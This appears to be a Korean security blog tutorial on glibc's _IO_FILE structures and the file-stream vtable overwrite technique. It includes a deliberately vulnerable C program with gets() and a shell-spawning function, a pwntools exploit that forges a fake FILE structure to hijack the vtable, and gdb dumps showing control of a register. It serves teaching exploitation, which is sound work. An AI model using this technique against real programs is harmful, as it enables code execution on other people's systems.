๊ฐœ๋…

"_IO_FILE"์€ ๋ฆฌ๋ˆ…์Šค ์‹œ์Šคํ…œ์˜ ํ‘œ์ค€ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์—์„œ ํŒŒ์ผ ์ŠคํŠธ๋ฆผ์„ ๋‚˜ํƒ€๋‚ด๋Š” ๊ตฌ์กฐ์ฒด์ด๋‹ค. "fopen"๊ณผ ๊ฐ™์€ ํŒŒ์ผ๊ณผ ๊ด€๋ จ์žˆ๋Š” ํ•จ์ˆ˜๋ฉด ํŒŒ์ผ ์ŠคํŠธ๋ฆผ์„ ์—ด ๋•Œ ํž™์— ํ• ๋‹น๋œ๋‹ค. "_IO_FILE" ๊ตฌ์กฐ์ฒด์˜ ์ •์˜๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */
  struct _IO_marker *_markers;
  struct _IO_FILE *_chain;
  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];
  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
  • _flags : ํŒŒ์ผ์— ๋Œ€ํ•œ rw ๊ถŒํ•œ ์˜๋ฏธ. "0xfbad0000"์ด ๋งค์ง๊ฐ’
  • _IO_read_ptr : ํŒŒ์ผ ์ฝ๊ธฐ ๋ฒ„ํผ์— ๋Œ€ํ•œ ํฌ์ธํ„ฐ
  • _IO_read_end : ํŒŒ์ผ ์ฝ๊ธฐ ๋ฒ„ํผ ์ฃผ์†Œ์˜ ๋์„ ๊ฐ€๋ฆฌํ‚ค๋Š” ํฌ์ธํ„ฐ
  • _IO_read_base : ํŒŒ์ผ ์ฝ๊ธฐ ๋ฒ„ํผ ์ฃผ์†Œ์˜ ์‹œ์ž‘์„ ๊ฐ€๋ฆฌ๋Š” ํฌ์ธํ„ฐ
  • _chain :  _IO_FILE๊ตฌ์กฐ์ฒด๋Š” _chain ํ•„๋“œ๋ฅผ ํ†ตํ•ด linked list๋ฅผ ์ƒ์„ฑ. linked list์˜ ํ—ค๋”๋Š” _IO_list_all์— ์ €์žฅ

_flags ํ•„๋“œ์˜ ์ฃผ์š” ๊ฐ’์„ ์‚ดํŽด๋ณด์ž.

_flags์˜ ๊ฐ’์ด 0xfbad2484๋ผ ํ•˜๋ฉด ์ด๋Š” 0xfbad0000+ 0x20000 + 0x400 + 0x80 + 0x4๋กœ ๋‚˜ํƒ€๋‚ผ ์ˆ˜ ์žˆ๋‹ค. ์ด๋Š” ๊ฐ๊ฐ "_IO_MAGIC", "_IO_IS_FILEBUF", "_IO_TIED_PUT_GET", "_IO_LINKED", "_IO_NO_READS"๋ฅผ ์˜๋ฏธํ•œ๋‹ค. ํŒŒ์ผ์„ ์—ด ๋•Œ ์“ฐ๊ธฐ๋ชจ๋“œ๋กœ ์—ด์–ด "_IO_NO_READS"๊ฐ€ ์กด์žฌํ•œ๋‹ค.

 

์•„๋ž˜๋Š” ํŒŒ์ผ์˜ ๋‚ด์šฉ์„ ์ฝ์–ด ์ถœ๋ ฅํ•˜๋Š” ์˜ˆ์ œ์ด๋‹ค. testfile ํŒŒ์ผ์„ ์—ด์–ด file_data์— 256๋ฐ”์ดํŠธ ๋ฐ์ดํ„ฐ๋ฅผ ์ž…๋ ฅ๋ฐ›๊ณ  ์ถœ๋ ฅํ•œ ํ›„ ์ŠคํŠธ๋ฆผ์„ ๋‹ซ๋Š” ์ฝ”๋“œ์ด๋‹ค. 

// gcc -o file2 file2.c 
#include <stdio.h>
int main()
{
	char file_data[256];
	int ret;
	FILE *fp;
	
	strcpy(file_data, "AAAA");
	fp = fopen("testfile","r");
	fread(file_data, 1, 256, fp);
	printf("%s",file_data);
	fclose(fp);
}

fread ํ•จ์ˆ˜๊ฐ€ ํ˜ธ์ถœ๋œ ์ดํ›„ fp ํฌ์ธํ„ฐ์˜ _IO_FILE ๊ตฌ์กฐ์ฒด๋ฅผ ์‚ดํŽด๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

gdb-peda$ x/100x 0x602010
0x602010:	0x00000000fbad2498	0x0000000000602240
0x602020:	0x0000000000602240	0x0000000000602240
0x602030:	0x0000000000602240	0x0000000000602240
0x602040:	0x0000000000602240	0x0000000000602240
0x602050:	0x0000000000603240	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x00007ffff7dd2540
0x602080:	0x0000000000000003	0x0000000000000000
0x602090:	0x0000000000000000	0x00000000006020f0
0x6020a0:	0xffffffffffffffff	0x0000000000000000
0x6020b0:	0x0000000000602100	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x00000000ffffffff	0x0000000000000000
0x6020e0:	0x0000000000000000	0x00007ffff7dd06e0
gdb-peda$ x/s 0x0000000000602240
0x602240:	"THIS IS TEST FILE!\n"

0x602240 ๋ฉ”๋ชจ๋ฆฌ ์ฃผ์†Œ์— ์ž…๋ ฅํ•œ ๊ฐ’์ด ๋“ค์–ด๊ฐ”์Œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

 

์‹ค์ œ ํŒŒ์ผ์„ ์—ด ๋•Œ๋Š” _IO_FILE_plus ๊ตฌ์กฐ์ฒด๊ฐ€ ๋ฆฌํ„ด๋œ๋‹ค. _IO_FILE_lpus ๊ตฌ์กฐ์ฒด๋Š” ํŒŒ์ผ ์ŠคํŠธ๋ฆผ์—์„œ ํ•จ์ˆ˜ ํ˜ธ์ถœ์„ ์šฉ์ดํ•˜๊ฒŒ ํ•˜๊ธฐ ์œ„ํ•ด _IO_FILE ๊ตฌ์กฐ์ฒด๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋Š” ํฌ์ธํ„ฐ๋ฅผ ์ถ”๊ฐ€ํ•œ ๊ตฌ์กฐ์ฒด๋‹ค. 

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

_IO_jump_t์—๋Š” fread, fwrite, fopen๊ณผ ๊ฐ™์€ ํ‘œ์ค€ ํ•จ์ˆ˜๋“ค์„ ํ˜ธ์ถœํ•œ๋‹ค.

 

์„ธ ํŒŒ์ผ ์ŠคํŠธ๋ฆผ "stdin", "stdout", "stderr"์€ ํ”„๋กœ์„ธ์Šค๊ฐ€ ์‹œ์ž‘ํ•  ๋•Œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์— ์˜ํ•ด ์ž๋™์ ์œผ๋กœ ์ƒ์„ฑ๋œ๋‹ค. ๋””๋ฒ„๊น…์œผ๋กœ ๊นŒ๋ณด๋ฉด 0x00000000fbad~~~ ๊ฐ’์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

 

_IO_FILE vtable overwrite

์šฐ๋ถ„ํˆฌ 16.04 ์ดํ›„ ๋ฒ„์ „๋ถ€ํ„ฐ๋Š” _IO_vtable_check ํ•จ์ˆ˜๊ฐ€ ์ถ”๊ฐ€๋˜์–ด์„œ ์•„๋ž˜ ๋ฐฉ๋ฒ•์œผ๋กœ ์ต์Šคํ”Œ๋กœ์ž‡์ด ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค.

 

์˜ˆ์ œ๋ฅผ ํ†ตํ•ด overwrite๋ฅผ ํ•ด๋ณด๊ฒ ๋‹ค.

// gcc -o fp_vtable fp_vtable.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
char name[256] = "\0";
FILE *fp = NULL;
void getshell() {
        system("/bin/sh");
}       
int main()
{
        int bytes;
        char random[4];
        fp = fopen("/dev/urandom", "r");
        printf("Name: ");
        fflush(stdout);
        gets(name);
        
        fread(random, 1, 4, fp);
        
        printf("random: %s", random);
        return 0;
}

getsํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด BOF ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๋‹ค.

fp - ํŒŒ์ผ ๊ตฌ์กฐ์ฒด์— ํ• ๋‹น๋œ ์˜์—ญ ๊ฐ€๋ฆฌํ‚ด

freadํ•จ์ˆ˜ ํ˜ธ์ถœ -> ํŒŒ์ผ ํฌ์ธํ„ฐ๊ฐ€ ๊ฐ€๋ฆฌํ‚ค๋Š” "_IO_FILE" ๊ตฌ์กฐ์ฒด์˜ vtable ์ฃผ์†Œ๋ฅผ ์ฐธ์กฐํ•ด ํ˜ธ์ถœ

 

๊ณต๊ฒฉ ๋ฐฉ๋ฒ• : fp๋ฅผ name ์ฃผ์†Œ๋กœ ์กฐ์ž‘ -> ํŒŒ์ผ ํ•จ์ˆ˜ ํ˜ธ์ถœ ์‹œ name ๋ฒ„ํผ๋ฅผ "_IO_FILE" ๊ตฌ์กฐ์ฒด๋กœ ์˜ค์ธํ•˜์—ฌ ์‚ฌ์šฉ

// name ๊ตฌ์กฐ

gdb-peda$ x/100x 0x6010a0
0x6010a0 <name>:	0x00000000fbad2488	0x0000000000000000
0x6010b0 <name+16>:	0x0000000000000000	0x0000000000000000
0x6010c0 <name+32>:	0x0000000000000000	0x0000000000000000
0x6010d0 <name+48>:	0x0000000000000000	0x0000000000000000
0x6010e0 <name+64>:	0x0000000000000000	0x0000000000000000
0x6010f0 <name+80>:	0x0000000000000000	0x0000000000000000
0x601100 <name+96>:	0x0000000000000000	0x0000000000000000
0x601110 <name+112>:	0x0000000000000003	0x0000000000000000
0x601120 <name+128>:	0x0000000000000000	0x0000000000601180
0x601130 <name+144>:	0xffffffffffffffff	0x0000000000000000
0x601140 <name+160>:	0x0000000000000000	0x0000000000000000
0x601150 <name+176>:	0x0000000000000000	0x0000000000000000
0x601160 <name+192>:	0x0000000000000000	0x0000000000000000
0x601170 <name+208>:	0x0000000000000000	0x0000000041414141 // vtable
0x601180 <name+224>:	0x0000000000000000	0x0000000000000000
0x601190 <name+240>:	0x0000000000000000	0x0000000000000000
0x6011a0 <fp>:	0x00000000006010a0	0x0000000000000000

 

from pwn import *
p = process("./fp_vtable")
elf = ELF("fp_vtable")
name_buf = elf.symbols['name']

# IO_FILE ๊ตฌ์กฐ์ฒด๋ฅผ ์ฐธ๊ณ ํ•˜์—ฌ ์ž‘์„ฑ
name = p64(0xfbad2488)
name += p64(0)*13
name += p64(3) # _fileno ๊ฐ’
name += p64(0)*2 # _flags2, _shortbuf[1] ๊ฐ’
name += p64(name_buf + 0xe0)
name += p64(0xffffffffffffffff)
name += p64(0)*8
name += p64(0x41414141) # vtable
name += "\x00"*(256-len(name))
name += p64(name_buf)

print p.sendlineafter("Name:", str(name))
gdb.attach(p)

p.interactive()

์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ๋ฅผ ์งค ๋•Œ ๋งจ ์œ„์˜ ๋””๋ฒ„๊น…์—์„œ name์˜ ๊ตฌ์กฐ์™€ _IO_FILE ๊ตฌ์กฐ์ฒด๋ฅผ ๊ฐ์•ˆํ•˜๊ณ  ํ•ด์„œ ์งœ์•ผ ํ•œ๋‹ค. ์ฃผ์„์„ ๋‹ฌ์•„๋†จ์œผ๋‹ˆ ์ฐธ๊ณ ํ•˜๊ธธ ๋ฐ”๋ž€๋‹ค.

 

๋ ˆ์ง€์Šคํ„ฐ ๊ฐ’๋“ค์„ ๋ณด๋ฉด 0x41414141๋กœ ๋ฐ”๋€ ๊ฑธ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

gdb-peda$ i r
rax            0x41414141	0x41414141
rbx            0x6010a0	0x6010a0
rcx            0x6010a0	0x6010a0
rdx            0x4	0x4
rsi            0x7ffe29143410	0x7ffe29143410
rdi            0x6010a0	0x6010a0
rbp            0x1	0x1
rsp            0x7ffe291433d8	0x7ffe291433d8
r8             0x601180	0x601180
r9             0x7ffe29143410	0x7ffe29143410
r10            0x7fa1fa1d6700	0x7fa1fa1d6700
r11            0x7fa1f9c751a0	0x7fa1f9c751a0
r12            0x4	0x4
r13            0x4	0x4
r14            0x0	0x0
r15            0x0	0x0
rip            0x7fa1f9c82707	0x7fa1f9c82707 <__GI__IO_sgetn+7>
eflags         0x10202	[ IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0
์ €์ž‘์žํ‘œ์‹œ ๋น„์˜๋ฆฌ ๋ณ€๊ฒฝ๊ธˆ์ง€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”